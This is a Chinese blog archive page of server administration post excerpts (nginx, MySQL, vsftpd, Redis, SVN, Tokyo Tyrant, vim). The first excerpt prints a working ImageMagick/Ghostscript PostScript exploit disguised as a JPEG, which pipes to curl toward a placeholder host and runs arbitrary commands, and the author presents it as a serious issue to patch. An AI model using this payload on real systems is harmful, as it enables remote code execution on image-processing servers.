分类目录归档:服务器端

imagemagick postscript漏洞

之前2016年的imagemagick的漏洞,升级到最新版本就行了。 https://www.jianshu.com/p/502e39c122e6 下载最新的版本执行不成功: convert: Not a JPEG file: starts with 0×70 0×75 `attack4.jpg’ @ error/jpeg.c/JPEGErrorHandler/332.   最近又来了这种 把以下内容保存为:attack.jpg %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%curl http://ip:8888) currentdevice putdeviceprops 红色部分可以改成其他任意linux命令,这个是相当严重的问题。 … 继续阅读

发表在 服务器端 | 标签为 | 留下评论

nginx目录列表显示时间

今天配置了http://q.pengduncun.com/ nginx 设置了autoindex on。但是显示的文件最后修改时间比当前时区少了8个小时。想到应该是时区的问题。找nginx的设置项。http://nginx.org/cn/docs/http/ngx_http_autoindex_module.html 设置 autoindex_localtime on 就可以了。 以后查nginx配置看官网的。http://nginx.org/cn/docs/

发表在 服务器端 | 标签为 | 留下评论

mysql cluster安装与配置

http://dev.mysql.com/downloads/cluster/ 选择 linux generic 下载64位系统用的。 mysql-cluster-gpl-7.3.5-linux-glibc2.5-x86_64.tar.gz http://dev.mysql.com/doc/refman/5.6/en/mysql-cluster-installation.html 开始看结合右侧目录结构树找到了对应的资料: http://dev.mysql.com/doc/refman/5.6/en/mysql-cluster-install-linux-binary.html http://dev.mysql.com/doc/refman/5.6/en/mysql-cluster-install-configuration.html http://dev.mysql.com/doc/refman/5.6/en/mysql-cluster-install-first-start.html 照着弄。机器只有2台腾讯云的2个微型配置的。 内网地址分别为 10.232.44.174 和 10.232.4.93   分别当一个data node 和 sql node  ,前者还用于管理节点。 可以知道这个包解压之后 就相当于 安装普通的mysql tar.gz包 编译安装后的目录。所以直接拿来用。(不然也不应该有400多m)。 tar -C  /usr/local      mysql-cluster-gpl-7.3.5-linux-glibc2.5-x86_64.tar.gz 名字太长太丑,做个软链接。多弄几个也行。(之前的环境用阿里云的一个脚本安装的,mysql在 /alidata/server 下,不在/usr/local下。) ln -s /usr/local/mysql-cluster-gpl-7.3.5-linux-glibc2.5-x86_64 /usr/local/mysql ln -s … 继续阅读

发表在 Mysql, 服务器端 | 标签为 | 留下评论

vim常用快捷键

转载:http://www.cnblogs.com/top5/archive/2011/02/07/1949666.html 参考:http://linux.chinaunix.net/techdoc/desktop/2009/03/15/1101397.shtml 光标控制命令       k h        l      j 命令                        光标移动 h或^h                    向左移一个字符 j或^j或^n … 继续阅读

发表在 服务器端 | 标签为 | 留下评论

mysql能用localhost连接不能使用127.0.0.1连接的解决办法

参考:http://blog.csdn.net/feng2375/article/details/7354045 最近朋友的一个服务器出现了一个奇怪的问题,弄了两个星期没有解决,在哥坚持不懈的努力下,终于解决了问题。发出来给需要的朋友。 问题:php程序连接mysql只能使用localhost,不能使用127.0.0.1 系统环境:centos5.5 64位系统  mysql 版本5.0.77 php版本5.2.17 以下为我解决问题的过程: 1、根据出错的提示信息“Warning: mysql_connect() [function.mysql-connect]: Can’t connect to MySQL server on ’127.0.0.1′”  使用google搜索mysql_connect 有人说是可能mysql_connect这个函数被禁用了,使用其它的连接,测试过不行。 2、使用google搜索mysql能用localhost连接,不能使用127.0.0.1连接,结果大部分人的解决办法是: 修改my.cnf文件,去掉skip_networking,bind_address=127.0.0.1,重启mysql 故障依旧。 权限问题,grant all privileges on *.* to ‘root’@’127.0.0.1′ identified by ‘密码’;   然后flush privileges;  故障依旧。 修改/etc/hosts文件,添加127.0.0.1  localhost 项,故障依旧。 … 继续阅读

发表在 服务器端 | 标签为 | 留下评论

MySQL通过localhost无法连接数据库的解决

参考: http://ju.outofmemory.cn/entry/11342 问题:一台服务器的PHP程序通过localhost地址无法连接数据库,但是如果设置为127.0.0.1则可以正常连接,连接其他数据库服务器也正常。MySQL的权限设置正确,且通过mysql命令行客户端可以正常连接数据库。 分析:这是典型的socket没有正确设置的情况。 连接MySQL数据库有两种方式:TCP/IP(一般理解的端口的那种)和Unix套接字(一般叫socket或者sock)。大部分情况下,可以用localhost代表本机127.0.0.1,但是在MySQL连接时,二者不可混用,而且MySQL中权限设置中localhost与127.0.0.1也是分开设置的。 当设置为127.0.0.1时,系统通过TCP/IP方式连接数据库; 当设置为localhost时,系统通过socket方式连接数据库。 解决:首先要看本机MySQL的socket套接字文件在哪里,查看命令是: mysqld –verbose –help | grep socket 输出结果显示套接字文件的位置,比如:这台服务器显示的是 socket /var/run/mysqld/mysqld.sock 然后修改php的配置文件php.ini与之对应起来就好了。 找到这一项: mysql.default_socket = 一般来说这一项都是空的,改成: mysql.default_socket = /var/run/mysqld/mysqld.sock 这里应写上一步查询到的文件,根据你的情况设置。至此php配置就修改好了,如果是CLI(命令行)方式或者CGI方式的话,立即就生效,如果是FASTCGI方式,需要重启一下fastcgi进程。(php-fpm 重启 service php-fpm restart)

发表在 服务器端 | 标签为 , , , | 留下评论

FTP配置之vsftpd.chroot_list

ftp安装详解 可以了解 http://www.cnblogs.com/hnrainll/archive/2011/02/16/1956538.html 本篇抄袭来自: http://blog.163.com/xiaohui_1123@126/blog/static/398052402010101995025953/ FTP配置文件vsftpd.conf关于限制用户在默认目录的配置,涉及到三个字段:chroot_local_user,chroot_list_enable,chroot_list_file。 我们按顺序配置下来吧!首先,要限制用户在默认目录必须将chroot_local_user设置为yes,即chroot_local_user=yes。此时,用户登录之后,执行目录跳转命令,如cd /home,显示550 Failed to change directory。你可以试试其他的账号,应该都是一样的结果,无法跳转目录。 接下来的问题是,我想对某些用户开个小灶,怎么办呢?那就要说到后面的两个字段啦! 设置如下:chroot_list_enable=yes chroot_list_file=/路径/vsftpd.chroot_list,这里的路径你可以自己指定,之后你要到指定的路径下面创建vsftpd.chroot_list文件。 上面两个设置的意思是(我自己的理解,呵呵!),第一个说明chroot_list这个列表有用,第二个是指明列表的位置。那接着说这个列表的作用,也就是这个vsftpd.chroot_list的作用吧。 做个试验,1.创建两个用户账号,first 和second;2.在上面配置指定的路径下面创建vsftpd.chroot_list文件,将first账号写入文件。 3.用first登录,然后执行目录跳转命令,发现可以成功跳转;用second登录,同样执行目录跳转命令,发现跳转失败。 接下来我们从另外一方面看,如果注释掉chroot_local_user=yes,再做上面的实验,结果刚好相反,first不能随意跳转,而second可以随意跳转。 结论:写入vsftpd.chroot_list文件的用户账号是有特权的账号。 别人都不可以跳的时候,它可以随意跳转; 别人都可以跳的时候,它不可以跳,呵呵!写入这个文件的账号太有个性啦!

发表在 服务器端 | 标签为 , , , | 留下评论

【转】REDIS WINDOWS 下配置

Windows版的Redis可到此处下载,非官方版http://code.google.com/p/servicestack/wiki/RedisWindowsDownload redis.conf复制以下===与====之内的内容=================================# Redis configuration file example # By default Redis does not run as a daemon. Use ‘yes’ if you need it.# Note that Redis will write a pid file in /var/run/redis.pid when daemonized.daemonize no # When run as a … 继续阅读

发表在 服务器端 | 标签为 | 留下评论

安装svn

参考:http://blog.iterse.com/archives/584 安装软件时需要开启某个扩展 –with-xx=?之前老是想着yum方式装的xx在哪里,=后面的参数应该如何写! 如果系统已装过xx 就不用=?让其自己去找。如果configure报错缺少该库,可能是该库没装上或者是没有装完全。yum install xx* -y 把相关的都装了再试试。有的是安装包下面有扩展的文件夹。比如svn的源码包下面就有zlib文件夹  –with-zlib=./zlib 即可。 2个svn相关的tar.gz包解压到同一文件夹了./configure –prefix=/usr/local/svn   -with-zlib=./zlib#设置svn命令环境变量echo “export PATH=$PATH:/usr/local/svn/bin” >>/etc/profilesource /etc/profilemkdir /data/svndatacd /data/svndatasvnadmin create test svnserve -d –listen-port 8443 -r /data/svndata cd /data/wwwroot/phpsvn co svn://localhost:8443/test windows测试。。。

发表在 服务器端 | 标签为 , | 留下评论

Tokyo Tyrant

网上的一些资料的整理:   TTserver参数设置详解:http://blog.163.com/chenxiaodong_2009/blog/static/129082330201022481421504/ 利用Tokyo Tyrant构建兼容Memcached协议、支持故障转移、高并发的分布式key-value持久存储系统:http://blog.s135.com/post/362/   ln -s /usr/local/tokyocabinet-1.4.47/lib/libtokyocabinet.so.9 /usr/local/lib/libtokyocabinet.so.9 tokyotyrant优点:1.用Tokyo Cabinet读写速度非常快,是Berkeley DB 等 DBM 的几倍。2.故障转移 (双机互为主辅模式)3.日志文件体积小4.任何Memcached客户端均可直接调用tokyotyrant。还可以通过HTTP方式调用 curl -X PUT http://192.168.0.249:1978/key -d "value"curl http://192.168.0.249:1978/keycurl -X DELETE http://192.168.0.249:1978/key 缺点:1.存进去的数据不到满了不会过期 2.当我们从中取数据时,会是一个序列化的字符串,没有自动反序列化处理3.32位操作系统 Tokyo Cabinet 数据库单个文件不能超过2G 启动:ttserver -host 192.168.0.249 -port 1978 -thnum 8 -dmn … 继续阅读

发表在 服务器端 | 标签为 , , | 留下评论